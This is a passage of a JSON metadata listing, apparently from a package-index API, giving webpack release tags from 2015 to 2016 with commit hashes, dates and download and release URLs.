https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/we